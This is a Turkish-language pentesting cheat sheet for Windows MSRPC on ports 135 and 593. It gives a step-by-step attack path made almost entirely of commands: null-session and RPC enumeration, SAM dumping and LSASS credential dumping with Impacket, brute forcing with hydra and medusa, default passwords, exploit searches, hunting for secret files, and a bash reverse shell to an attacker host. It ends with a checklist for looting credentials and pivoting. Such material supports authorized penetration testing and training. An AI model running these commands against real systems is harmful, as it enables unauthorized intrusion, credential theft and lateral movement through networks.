Skip to content

135, 593 - Pentesting MSRPC

MSRPC windows

TCP/135 Windows RPC endpoint mapper’dır. Null session, interface dump ve DCERPC saldırıları AD/lateral için kritik yüzey.

  1. 135/445/139 açık mı bak.

  2. epmapper ve interface enum yap.

  3. Null session / named pipe dene.

  4. Credential ile sam/lsa/svc abuse.

Terminal window
nmap -Pn -sV -p135,139,445 TARGET
Terminal window
nmap -Pn -p135,139,445 --script msrpc-enum,rpc-grind TARGET
Terminal window
rpcdump.py TARGET
Terminal window
impacket-rpcdump TARGET
Terminal window
rpcclient -U '' -N TARGET
Terminal window
enum4linux-ng -A TARGET
Terminal window
nxc smb TARGET -u '' -p ''
Terminal window
impacket-samrdump DOMAIN/user:pass@TARGET
Terminal window
impacket-lsassy TARGET -u user -p pass
Terminal window
nxc smb TARGET -u user -p pass -M spider_plus

, 593 - MSRPC için ek keşif ve fingerprint.

Terminal window
nmap -Pn -sV -sC -p135,593 TARGET
Terminal window
nmap -Pn -p135 --script safe,discovery TARGET
Terminal window
timeout 5 bash -c 'echo | openssl s_client -connect TARGET:135' 2>/dev/null | head
Terminal window
python3 -c "import socket;s=socket.create_connection(('TARGET',135));s.settimeout(3);print(s.recv(4096))"
Banner / TLS / ALPN notları → , 593 - MSRPC
Terminal window
hydra -L users.txt -P rockyou.txt -s 135 PROTOCOL://TARGET -t 4
Terminal window
medusa -h TARGET -U users.txt -P rockyou.txt -M PROTOCOL -n 135
Terminal window
nmap -p135 --script '*-brute' TARGET
admin/admin, root/root, guest/(boş), test/test
Terminal window
searchsploit MSRPC
Terminal window
msfconsole -q -x 'search MSRPC; exit'
Terminal window
nuclei -u https://TARGET:135 -t cves/ -silent -severity || true
Terminal window
nuclei -u http://TARGET:135 -tags tech -silent || true
Terminal window
nc -nv TARGET 135
Terminal window
printf '
' | timeout 3 nc -nv TARGET 135
Terminal window
curl -vk --http1.0 http://TARGET:135/
Wireshark/tcpdump ile konuşmayı kaydet; replay dene
config, key, session, env, backup
Terminal window
find / -name '*.conf' -o -name '*.env' -o -name 'id_rsa' 2>/dev/null | head
Terminal window
ss -lntp; ip a; cat /etc/passwd | head
Terminal window
bash -i >& /dev/tcp/ATTACKER/443 0>&1
Terminal window
mkdir -p loot && tee loot/notes.txt
[ ] Fingerprint / sürüm
[ ] Auth ve anonim erişim
[ ] PoC etki gösterildi
[ ] Credential/shell paketlendi
[ ] Pivot notu
rpcdump → null session → creds → sam/lsa → lateral